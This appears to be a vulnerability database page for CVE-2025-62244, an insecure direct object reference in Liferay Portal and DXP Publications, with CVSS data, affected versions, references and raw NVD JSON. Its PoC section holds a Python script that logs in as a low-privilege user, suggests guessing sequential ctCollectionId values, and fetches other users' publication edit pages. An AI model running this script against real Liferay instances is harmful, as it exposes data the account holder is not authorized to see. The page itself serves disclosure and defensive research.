CVE-2025-62244

Description

Insecure direct object reference (IDOR) vulnerability in Publications in Liferay Portal 7.3.1 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92, and 7.3 GA through update 36 allows remote authenticated attackers to view the edit page of a publication via the _com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId parameter.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.3.1 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 GA - update 92

Liferay DXP 7.3 GA - update 36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62244 PoC - Liferay Portal Publications IDOR # This PoC demonstrates how an authenticated low-privilege user can # access the edit page of publications they should not have access to # by manipulating the ctCollectionId parameter. import requests # Target Liferay Portal/DXP instance TARGET_URL = "https://target-liferay-instance.com" # Authenticated session (attacker needs a valid low-privilege account) session = requests.Session() # Step 1: Authenticate to the Liferay portal login_url = f"{TARGET_URL}/c/portal/login" login_data = { "_com_liferay_login_web_portlet_LoginPortlet_cmd": "authenticate", "_com_liferay_login_web_portlet_LoginPortlet_redirect": "/web/guest/home", "_com_liferay_login_web_portlet_LoginPortlet_emailAddress": "[email protected]", "_com_liferay_login_web_portlet_LoginPortlet_password": "password123" } session.post(login_url, data=login_data) # Step 2: Enumerate target publication IDs (ctCollectionId values) # These are typically sequential integers - brute force or guess valid IDs target_ct_collection_id = 1 # Target publication ID to access # Step 3: Exploit the IDOR vulnerability by accessing the Publications edit page # with the manipulated ctCollectionId parameter exploit_url = ( f"{TARGET_URL}/group/control_panel/manage" f"?p_p_id=com_liferay_change_tracking_web_portlet_PublicationsPortlet" f"&p_p_lifecycle=0" f"&p_p_state=maximized" f"&_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName=%2Fchange_tracking%2Fview_publication" f"&_com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId={target_ct_collection_id}" ) response = session.get(exploit_url) # Step 4: Check if the exploit was successful if response.status_code == 200 and "Publication" in response.text: print(f"[+] IDOR exploit successful! Accessed publication ID: {target_ct_collection_id}") # Extract sensitive publication information from the response print(response.text[:2000]) else: print(f"[-] Exploit failed. Status code: {response.status_code}") # Alternative: Direct URL-based exploitation # Simply navigate to the URL with the target ctCollectionId parameter # while authenticated as any user with portal access.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62244
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62244
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62244/
[4] VulDB https://vuldb.com/cve/CVE-2025-62244
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62244

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62244", "sourceIdentifier": "[email protected]", "published": "2025-10-13T17:15:34.900", "lastModified": "2025-12-15T18:11:03.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure direct object reference (IDOR) vulnerability in Publications in Liferay Portal 7.3.1 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92, and 7.3 GA through update 36 allows remote authenticated attackers to view the edit page of a publication via the _com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "324106E0-0AA8-42EB-80C7-21AC59ECDC57"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.1", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "DB31ED9C-996C-4073-AFAA-363E23C98772"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62244", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}